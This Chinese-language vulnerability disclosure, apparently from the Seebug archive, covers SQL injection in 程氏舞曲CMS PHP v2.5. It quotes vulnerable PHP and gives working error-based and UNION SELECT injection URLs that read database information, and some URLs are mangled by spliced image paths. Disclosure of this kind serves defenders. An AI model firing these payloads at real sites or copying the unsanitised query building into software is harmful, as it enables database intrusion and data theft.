程氏舞曲管理系统php版 v2.5,程氏舞曲CMS最新php版本多处sql注入漏洞

### 简要描述：

操蛋捏。

### 详细说明：

昨天刚下载的，2.16号更新的版本。

第一处在管理后台：https://images.seebug.org/upload/app/controllers/admin/news.php第66行

```

public function so()

{

$key = $this->input->get('key');//使用get方式获取相关参数，没做处理

$user = $this->input->get('user');

$cid = $this->input->get('cid');

$page = $this->input->get('page');

if(empty($page)) $page=1;

$sql_string = "SELECT * FROM ".CS_SqlPrefix."news where 1=1";

if($key){

$sql_string.= " and CS_Name like '%".$key."%'";

}

if($user){

$sql_string.= " and CS_User like '%".$user."%'";

}

if($cid){

if($cid=="-1"){

$sql_string.= " and cs_hid=1";

}elseif($cid=="-2"){

$sql_string.= " and cs_yid=1";

}else{

$sql_string.= " and CS_CID=".$cid."";

}

}

$sql_string.= " order by CS_AddTime desc";//拼接字符串

$query = $this->db->query($sql_string); //没处理带入查询

$total = $query->num_rows();

```

请求url：http://127.0.0.1/cmshttps://images.seebug.org/upload/index.php/admin/dance/so/?key=1' AND (SELECT 5960 FROM(SELECT COUNT(*),CONCAT((select user()),(SELECT (CASE WHEN (5960=5960) THEN 1 ELSE 0 END)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)%23

利用显错读取信息。

[](https://images.seebug.org/upload/201402/180920338e24e8172c1119ba2cfdb52b05a42d33.png)

还有一处在前台：https://images.seebug.org/upload/app/controllers/singer.php第127行

```

public function so()

{

$data='';$data_content='';

$fid = $this->security->xss_clean($this->uri->segment(3)); //方式

$key = $this->security->xss_clean($this->uri->segment(4)); //关键字

$page = intval($this->security->xss_clean($this->uri->segment(5))); //页数

if($page==0) $page=1;

if(empty($key)) $key = $this->input->post('key', TRUE);//以post方式接受key值

```

跟踪变量同一文件165行 ：

```

if($fid=='zm' && in_array(strtoupper($key),$zimu_arr)){ //按字母搜索

$posarr=array_keys($zimu_arr,strtoupper($key));

$pos=$posarr[0];

$sqlstr="SELECT * FROM ".CS_SqlPrefix."singer where CS_YID=0 and ((ord( substring( CS_Name, 1, 1 ) ) -65536>=".($zimu_arr1[$pos])." and ord( substring( CS_Name, 1, 1 ) ) -65536<=".($zimu_arr2[$pos]).")) or UPPER(substring( CS_Name, 1, 1 ))='".$zimu_arr[$pos]."'";

}else{

$sqlstr="select * from ".CS_SqlPrefix."singer where CS_YID=0 and CS_Name like '%".$key."%' order by CS_AddTime desc";//$key带入查询，中间没做处理

}

```

[](https://images.seebug.org/upload/201402/18092519b9d8b9104c8c44b319c0436a1d3a289e.png)

### 漏洞证明：

第二处没法根据显错读取信息，sql语句不过关...

但是可以使用union读取字段等信息(附上payload：http://127.0.0.1/cmshttps://images.seebug.org/upload/index.php/vod/so/key/%25%27%20union%20select%201%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%23)

返回正确，表示有39个字段